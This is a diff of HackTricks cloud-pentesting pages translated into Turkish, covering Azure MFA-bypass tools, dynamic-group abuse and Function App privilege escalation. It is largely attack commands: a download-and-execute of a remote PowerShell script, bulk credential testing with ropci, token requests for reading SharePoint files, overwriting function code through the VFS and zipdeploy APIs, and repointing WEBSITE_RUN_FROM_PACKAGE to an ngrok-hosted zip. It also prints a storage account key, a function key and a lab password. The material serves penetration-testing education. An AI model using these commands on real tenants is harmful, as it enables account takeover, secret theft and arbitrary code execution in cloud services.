### [roadrecon](https://github.com/dirkjanm/ROADtools)
Get all the policies
Tüm politikaları alır.
```bash
roadrecon plugin policies
```
### [Invoke-MFASweep](https://github.com/dafthack/MFASweep)
MFASweep is a PowerShell script that attempts to **log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled**. Depending on how conditional access policies and other multi-factor authentication settings are configured some protocols may end up being left single factor. It also has an additional check for ADFS configurations and can attempt to log in to the on-prem ADFS server if detected.
MFASweep, sağlanan bir kimlik bilgileri seti kullanarak **çeşitli Microsoft hizmetlerine giriş yapmayı deneyen ve MFA'nın etkin olup olmadığını belirlemeye çalışan** bir PowerShell betiğidir. Koşullu erişim politikaları ve diğer çok faktörlü kimlik doğrulama ayarlarının nasıl yapılandırıldığına bağlı olarak bazı protokoller tek faktörlü kalabilir. Ayrıca ADFS yapılandırmaları için ek bir kontrol içerir ve tespit edilirse yerel ADFS sunucusuna giriş yapmayı deneyebilir.
```bash
Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1").Content
Invoke-MFASweep -Username <username> -Password <pass>
```
### [ROPCI](https://github.com/wunderwuzzi23/ropci)
This tool has helped identify MFA bypasses and then abuse APIs in multiple production AAD tenants, where AAD customers believed they had MFA enforced, but ROPC based authentication succeeded.
Bu araç, MFA atlatmalarını tanımlamaya ve ardından birden fazla üretim AAD kiracısında API'leri kötüye kullanmaya yardımcı olmuştur; burada AAD müşterileri MFA'nın zorunlu olduğunu düşünüyordu, ancak ROPC tabanlı kimlik doğrulama başarılı oldu.
> [!TIP]
> You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force.
> Brute-force yapmak için uygulamaların listesini oluşturabilmek için tüm uygulamaları listeleme izinlerinizin olması gerekir.
```bash
./ropci configure
./ropci apps list --all --format json -o apps.json
./ropci apps list --all --format json | jq -r '.value[] | [.displayName,.appId] | @csv' > apps.csv
./ropci auth bulk -i apps.csv -o results.json
```
### [donkeytoken](https://github.com/silverhack/donkeytoken)
Donkey token is a set of functions which aim to help security consultants who need to validate Conditional Access Policies, tests for 2FA-enabled Microsoft portals, etc..
Donkey token, Conditional Access Policies'ı doğrulamak, 2FA etkinleştirilmiş Microsoft portalları için testler yapmak gibi ihtiyaçları olan güvenlik danışmanlarına yardımcı olmayı amaçlayan bir dizi işlevdir.
<pre class="language-powershell"><code class="lang-powershell"><strong>git clone https://github.com/silverhack/donkeytoken.git
</strong><strong>Import-Module '.\donkeytoken' -Force
</strong></code></pre>
**Test each portal** if it's possible to **login without MFA**:
**Her portali test edin** eğer **MFA olmadan giriş yapmak mümkünse**:
```powershell
$username = "conditional-access-app-user@azure.training.hacktricks.xyz"
$password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
```
Because the **Azure** **portal** is **not constrained** it's possible to **gather a token from the portal endpoint to access any service detected** by the previous execution. In this case Sharepoint was identified, and a token to access it is requested:
Çünkü **Azure** **portalı** **kısıtlanmamıştır**, önceki yürütme tarafından tespit edilen herhangi bir hizmete erişmek için **portal uç noktasından bir token toplamak** mümkündür. Bu durumda Sharepoint tanımlandı ve ona erişmek için bir token talep edildi:
```powershell
$token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
Read-JWTtoken -token $token.access_token
```
Supposing the token has the permission Sites.Read.All (from Sharepoint), even if you cannot access Sharepoint from the web because of MFA, it's possible to use the token to access the files with the generated token:
Varsayalım ki token, Sites.Read.All (Sharepoint'tan) iznine sahiptir, MFA nedeniyle web üzerinden Sharepoint'e erişemeseniz bile, oluşturulan token ile dosyalara erişmek mümkündür:
```powershell
$data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl
```
## References
## Referanslar
- [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM&t=296s)
- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
{{#include ../../../../banners/hacktricks-training.md}}

42
src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
View File

@@ -1,29 +1,28 @@
# Az - Dynamic Groups Privesc
# Az - Dinamik Gruplar Privesc
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**.
**Dinamik gruplar**, belirli bir **kural** setine sahip olan ve bu kurallara uyan tüm **kullanıcılar veya cihazlar** grubun içine eklenen gruplardır. Her seferinde bir kullanıcı veya cihazın **özelliği** **değiştiğinde**, dinamik kurallar **yeniden kontrol edilir**. Ve yeni bir **kural** **oluşturulduğunda** tüm cihazlar ve kullanıcılar **kontrol edilir**.
Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups.
Dinamik gruplara **Azure RBAC rolleri atanabilir**, ancak dinamik gruplara **AzureAD rolleri** eklemek **mümkün değildir**.
This feature requires Azure AD premium P1 license.
Bu özellik Azure AD premium P1 lisansı gerektirir.
## Privesc
Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes.
Varsayılan olarak, herhangi bir kullanıcının Azure AD'de misafir davet edebileceğini unutmayın, bu nedenle, bir dinamik grup **kuralı** kullanıcıların **özelliklerine** dayalı olarak **izinler** veriyorsa ve bu özellikler yeni bir **misafirde** **belirlenebiliyorsa**, bu özelliklere sahip bir **misafir oluşturmak** ve **yetki yükseltmek** mümkündür. Ayrıca, bir misafirin kendi profilini yönetmesi ve bu özellikleri değiştirmesi de mümkündür.
Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`**
Dinamik üyeliğe izin veren grupları alın: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`**
### Example
### Örnek
- **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")`
- **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group
For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\
Unfortunately the page doesn't allow to modify the attribute values so we need to use the API:
- **Kural örneği**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")`
- **Kural açıklaması**: 'security' dizesine sahip bir ikincil e-posta adresine sahip herhangi bir Misafir kullanıcı gruba eklenecektir.
Misafir kullanıcı e-postası için daveti kabul edin ve **o kullanıcının** mevcut ayarlarını [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView) adresinde kontrol edin.\
Ne yazık ki, sayfa özellik değerlerini değiştirmeye izin vermiyor, bu nedenle API'yi kullanmamız gerekiyor:
```powershell
# Login with the gust user
az login --allow-no-subscriptions
@@ -33,22 +32,17 @@ az ad signed-in-user show
# Update otherMails
az rest --method PATCH \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--headers 'Content-Type=application/json' \
--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--headers 'Content-Type=application/json' \
--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'
# Verify the update
az rest --method GET \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--query "otherMails"
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--query "otherMails"
```
## References
## Referanslar
- [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/)
{{#include ../../../../banners/hacktricks-training.md}}

330
src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
View File

@@ -4,7 +4,7 @@
## Function Apps
Check the following page for more information:
Daha fazla bilgi için aşağıdaki sayfayı kontrol edin:
{{#ref}}
../az-services/az-function-apps.md
@@ -12,33 +12,30 @@ Check the following page for more information:
### Bucket Read/Write
With permissions to read the containers inside the Storage Account that stores the function data it's possible to find **different containers** (custom or with pre-defined names) that might contain **the code executed by the function**.
Fonksiyon verilerini depolayan Storage Account içindeki konteynerleri okuma izinleri ile **farklı konteynerler** (özel veya önceden tanımlanmış isimlerle) bulmak mümkündür; bu konteynerler **fonksiyon tarafından yürütülen kodu** içerebilir.
Once you find where the code of the function is located if you have write permissions over it you can make the function execute any code and escalate privileges to the managed identities attached to the function.
Fonksiyonun kodunun nerede bulunduğunu bulduğunuzda, eğer üzerinde yazma izinleriniz varsa, fonksiyonu herhangi bir kodu yürütmesi için ayarlayabilir ve fonksiyona bağlı yönetilen kimliklere ayrıcalıkları yükseltebilirsiniz.
- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)`
- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` ve `WEBSITE_CONTENTSHARE`)
The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function.
This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`** which you can get from&#x20;
Fonksiyonun kodu genellikle bir dosya paylaşımında saklanır. Yeterli erişim ile kod dosyasını değiştirmek ve **fonksiyonun rastgele kod yüklemesini sağlamak** mümkündür; bu da fonksiyona bağlı yönetilen kimliklere ayrıcalıkları yükseltmeyi sağlar.
Bu dağıtım yöntemi genellikle **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** ve **`WEBSITE_CONTENTSHARE`** ayarlarını yapılandırır; bunları alabilirsiniz.
```bash
az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-group>
--name <app-name> \
--resource-group <res-group>
```
Those configs will contain the **Storage Account Key** that the Function can use to access the code.
Bu yapılandırmalar, Fonksiyonun koduna erişmek için kullanabileceği **Storage Account Key**'ni içerecektir.
> [!CAUTION]
> With enough permission to connect to the File Share and **modify the script** running it's possible to execute arbitrary code in the Function and escalate privileges.
> Dosya Paylaşımına bağlanmak ve **script'i değiştirmek** için yeterli izne sahip olduğunuzda, Fonksiyonda rastgele kod çalıştırmak ve ayrıcalıkları yükseltmek mümkündür.
The following example uses macOS to connect to the file share, but it's recommended to check also the following page for more info about file shares:
Aşağıdaki örnek, dosya paylaşımına bağlanmak için macOS kullanmaktadır, ancak dosya paylaşımları hakkında daha fazla bilgi için aşağıdaki sayfayı kontrol etmeniz önerilir:
{{#ref}}
../az-services/az-file-shares.md
{{#endref}}
```bash
# Username is the name of the storage account
# Password is the Storage Account Key
@@ -48,50 +45,46 @@ The following example uses macOS to connect to the file share, but it's recommen
open "smb://<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>"
```
- **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`)
It's also common to find the **zip releases** inside the folder `function-releases` of the Storage Account container that the function app is using in a container **usually called `function-releases`**.
Usually this deployment method will set the `WEBSITE_RUN_FROM_PACKAGE` config in:
Fonksiyon uygulamasının kullandığı Storage Account konteynerinin `function-releases` klasöründe **zip sürümlerini** bulmak da yaygındır.
Genellikle bu dağıtım yöntemi `WEBSITE_RUN_FROM_PACKAGE` yapılandırmasını ayarlayacaktır:
```bash
az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-group>
--name <app-name> \
--resource-group <res-group>
```
This config will usually contain a **SAS URL to download** the code from the Storage Account.
Bu yapılandırma genellikle **Kodun indirilmesi için bir SAS URL'si** içerecektir.
> [!CAUTION]
> With enough permission to connect to the blob container that **contains the code in zip** it's possible to execute arbitrary code in the Function and escalate privileges.
> Zip içinde **kodun bulunduğu** blob konteynerine bağlanmak için yeterli izinle, Fonksiyonda rastgele kod çalıştırmak ve ayrıcalıkları yükseltmek mümkündür.
- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)`
- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)`
Just like in the previous case, if the deployment is done via Github Actions it's possible to find the folder **`github-actions-deploy`** in the Storage Account containing a zip of the code and a SAS URL to the zip in the setting `WEBSITE_RUN_FROM_PACKAGE`.
Önceki durumda olduğu gibi, dağıtım Github Actions aracılığıyla yapıldığında, kodun zip'ini ve `WEBSITE_RUN_FROM_PACKAGE` ayarındaki zip için bir SAS URL'sini içeren **`github-actions-deploy`** klasörünü Depolama Hesabında bulmak mümkündür.
- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`)
With permissions to read the containers inside the Storage Account that stores the function data it's possible to find the container **`scm-releases`**. In there it's possible to find the latest release in **Squashfs filesystem file format** and therefore it's possible to read the code of the function:
- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` ve `WEBSITE_CONTENTSHARE`)
Fonksiyon verilerini depolayan Depolama Hesabındaki konteynerleri okuma izinleri ile **`scm-releases`** konteynerini bulmak mümkündür. Orada, **Squashfs dosya sistemi dosya formatında** en son sürümü bulmak ve dolayısıyla fonksiyonun kodunu okumak mümkündür:
```bash
# List containers inside the storage account of the function app
az storage container list \
--account-name <acc-name> \
--output table
--account-name <acc-name> \
--output table
# List files inside one container
az storage blob list \
--account-name <acc-name> \
--container-name <container-name> \
--output table
--account-name <acc-name> \
--container-name <container-name> \
--output table
# Download file
az storage blob download \
--account-name <res-group> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip
--account-name <res-group> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip
## Even if it looks like the file is a .zip, it's a Squashfs filesystem
@@ -105,12 +98,10 @@ unsquashfs -l "/tmp/scm-latest-<app-name>.zip"
mkdir /tmp/fs
unsquashfs -d /tmp/fs /tmp/scm-latest-<app-name>.zip
```
It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **`<app-name>`** in the JSON files you can find inside.
Ayrıca, **`<app-name>`** klasöründeki JSON dosyalarında bulunan **`azure-webjobs-secrets`** konteynerinde depolanan **master ve functions anahtarlarını** bulmak da mümkündür.
> [!CAUTION]
> With enough permission to connect to the blob container that **contains the code in a zip extension file** (which actually is a **`squashfs`**) it's possible to execute arbitrary code in the Function and escalate privileges.
> **Zip uzantılı bir dosyada** (aslında bir **`squashfs`** olan) kodu içeren blob konteynerine bağlanmak için yeterli izne sahip olduğunuzda, Fonksiyonda rastgele kod çalıştırmak ve ayrıcalıkları yükseltmek mümkündür.
```bash
# Modify code inside the script in /tmp/fs adding your code
@@ -119,36 +110,30 @@ mksquashfs /tmp/fs /tmp/scm-latest-<app-name>.zip -b 131072 -noappend
# Upload it to the blob storage
az storage blob upload \
--account-name <storage-account> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip \
--overwrite
--account-name <storage-account> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip \
--overwrite
```
### Microsoft.Web/sites/host/listkeys/action
This permission allows to list the function, master and system keys, but not the host one, of the specified function with:
Bu izin, belirtilen fonksiyonun işlev, ana ve sistem anahtarlarını listelemeye izin verir, ancak anahtarını listelemez:
```bash
az functionapp keys list --resource-group <res_group> --name <func-name>
```
With the master key it's also possible to to get the source code in a URL like:
Master anahtarı ile, aşağıdaki gibi bir URL'de kaynak kodunu almak da mümkündür:
```bash
# Get "script_href" from
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
# Access
curl "<script-href>?code=<master-key>"
## Python example:
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v
```
And to **change the code that is being executed** in the function with:
Ve **fonksiyonda yürütülen kodu değiştirmek için**:
```bash
# Set the code to set in the function in /tmp/function_app.py
## The following continues using the python example
@@ -158,73 +143,57 @@ curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwro
-H "If-Match: *" \
-v
```
### Microsoft.Web/sites/functions/listKeys/action
This permission allows to get the host key, of the specified function with:
Bu izin, belirtilen işlevin anahtarını almak için kullanılır:
```bash
az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"
```
### Microsoft.Web/sites/host/functionKeys/write
This permission allows to create/update a function key of the specified function with:
Bu izin, belirtilen işlevin bir işlev anahtarını oluşturmasına/güncellemesine izin verir:
```bash
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```
### Microsoft.Web/sites/host/masterKey/write
This permission allows to create/update a master key to the specified function with:
Bu izin, belirtilen işlev için bir anahtar oluşturmayı/güncellemeyi sağlar:
```bash
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```
> [!CAUTION]
> Remember that with this key you can also access the source code and modify it as explained before!
> Bu anahtar ile daha önce açıklandığı gibi kaynak koduna erişebilir ve onu değiştirebileceğinizi unutmayın!
### Microsoft.Web/sites/host/systemKeys/write
This permission allows to create/update a system function key to the specified function with:
Bu izin, belirtilen işlev için bir sistem işlev anahtarı oluşturmayı/güncellemeyi sağlar:
```bash
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```
### Microsoft.Web/sites/config/list/action
This permission allows to get the settings of a function. Inside these configurations it might be possible to find the default values **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which contains an **account key to access the blob storage of the function with FULL permissions**.
Bu izin, bir fonksiyonun ayarlarını almayı sağlar. Bu yapılandırmaların içinde, **FULL izinlerle fonksiyonun blob depolamasına erişmek için bir hesap anahtarı içeren** **`AzureWebJobsStorage`** veya **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** varsayılan değerlerini bulmak mümkün olabilir.
```bash
az functionapp config appsettings list --name <func-name> --resource-group <res-group>
```
Moreover, this permission also allows to get the **SCM username and password** (if enabled) with:
Ayrıca, bu izin **SCM kullanıcı adı ve şifresini** (eğer etkinleştirilmişse) almak için de kullanılabilir:
```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/publishingcredentials/list?api-version=2018-11-01"
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/publishingcredentials/list?api-version=2018-11-01"
```
### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write
These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located.&#x20;
Bu izinler, daha önce gördüğümüz gibi bir fonksiyonun yapılandırma değerlerini listelemeye ve **bu değerleri değiştirmeye** olanak tanır. Bu, bu ayarların, fonksiyon içinde çalıştırılacak kodun nerede bulunduğunu gösterdiği için faydalıdır.&#x20;
It's therefore possible to set the value of the setting **`WEBSITE_RUN_FROM_PACKAGE`** pointing to an URL zip file containing the new code to execute inside a web application:
- Start by getting the current config
Bu nedenle, bir web uygulaması içinde çalıştırılacak yeni kodu içeren bir URL zip dosyasına işaret eden **`WEBSITE_RUN_FROM_PACKAGE`** ayarının değerini ayarlamak mümkündür:
- Mevcut yapılandırmayı alarak başlayın
```bash
az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-name>
--name <app-name> \
--resource-group <res-name>
```
- Create the code you want the function to run and host it publicly
- Fonksiyonun çalıştırmasını istediğiniz kodu oluşturun ve bunu herkese açık olarak barındırın.
```bash
# Write inside /tmp/web/function_app.py the code of the function
cd /tmp/web/function_app.py
@@ -234,228 +203,189 @@ python3 -m http.server
# Serve it using ngrok for example
ngrok http 8000
```
- Fonksiyonu değiştirin, önceki parametreleri koruyun ve sonunda **`WEBSITE_RUN_FROM_PACKAGE`**'i kodu içeren **zip**'in URL'sine işaret edecek şekilde ekleyin.
- Modify the function, keep the previous parameters and add at the end the config **`WEBSITE_RUN_FROM_PACKAGE`** pointing to the URL with the **zip** containing the code.
The following is an example of my **own settings you will need to change the values for yours**, note at the end the values `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , this is where I was hosting the app.
Aşağıda **kendi ayarlarımın bir örneği var, değerleri sizin için değiştirmeniz gerekecek**, sonunda `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` değerine dikkat edin, uygulamayı burada barındırıyordum.
```bash
# Modify the function
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/newfunctiontestlatestrelease/config/appsettings?api-version=2023-01-01" \
--headers '{"Content-Type": "application/json"}' \
--body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}'
--uri "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/newfunctiontestlatestrelease/config/appsettings?api-version=2023-01-01" \
--headers '{"Content-Type": "application/json"}' \
--body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}'
```
### Microsoft.Web/sites/hostruntime/vfs/write
With this permission it's **possible to modify the code of an application** through the web console (or through the following API endpoint):
Bu izinle, **bir uygulamanın kodunu web konsolu aracılığıyla** (veya aşağıdaki API uç noktası aracılığıyla) değiştirmek mümkündür:
```bash
# This is a python example, so we will be overwritting function_app.py
# Store in /tmp/body the raw python code to put in the function
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
--headers '{"Content-Type": "application/json", "If-Match": "*"}' \
--body @/tmp/body
--uri "https://management.azure.com/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
--headers '{"Content-Type": "application/json", "If-Match": "*"}' \
--body @/tmp/body
```
### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)
This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**:
Bu izin, temel olarak **temel kimlik doğrulama kimlik bilgilerini** içeren tüm yayın profillerini listelemeye olanak tanır:
```bash
# Get creds
az functionapp deployment list-publishing-profiles \
--name <app-name> \
--resource-group <res-name> \
--output json
--name <app-name> \
--resource-group <res-name> \
--output json
```
Another option would be to set you own creds and use them using:
Başka bir seçenek, kendi kimlik bilgilerinizi ayarlamak ve bunları kullanmaktır:
```bash
az functionapp deployment user set \
--user-name DeployUser123456 g \
--password 'P@ssw0rd123!'
--user-name DeployUser123456 g \
--password 'P@ssw0rd123!'
```
- Eğer **REDACTED** kimlik bilgileri
- If **REDACTED** credentials
If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
Bu kimlik bilgilerini **REDACTED** olarak görüyorsanız, bunun nedeni **SCM temel kimlik doğrulama seçeneğini etkinleştirmeniz gerektiğidir** ve bunun için ikinci izne (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` ihtiyacınız var.
```bash
# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}
```
- **Method SCM**
Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables:
Sonra, **bu temel kimlik bilgileri ile işlev uygulamanızın SCM URL'sine** erişebilir ve env değişkenlerinin değerlerini alabilirsiniz:
```bash
# Get settings values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v
https://<app-name>.scm.azurewebsites.net/api/settings -v
# Deploy code to the funciton
zip function_app.zip function_app.py # Your code in function_app.py
curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
https://<app-name>.scm.azurewebsites.net/api/zipdeploy
https://<app-name>.scm.azurewebsites.net/api/zipdeploy
```
_Not edin ki **SCM kullanıcı adı** genellikle "$" karakteri ile başlar ve uygulamanın adı ile devam eder, yani: `$<app-name>`._
_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$<app-name>`._
Web sayfasına `https://<app-name>.scm.azurewebsites.net/BasicAuth` adresinden de erişebilirsiniz.
You can also access the web page from `https://<app-name>.scm.azurewebsites.net/BasicAuth`
Ayar değerleri, fonksiyon uygulamasının verilerini depolayan depolama hesabının **AccountKey**'sini içerir ve bu depolama hesabını kontrol etmenizi sağlar.
The settings values contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account.
- **Method FTP**
Connect to the FTP server using:
- **Yöntem FTP**
FTP sunucusuna bağlanmak için:
```bash
# macOS install lftp
brew install lftp
# Connect using lftp
lftp -u '<username>','<password>' \
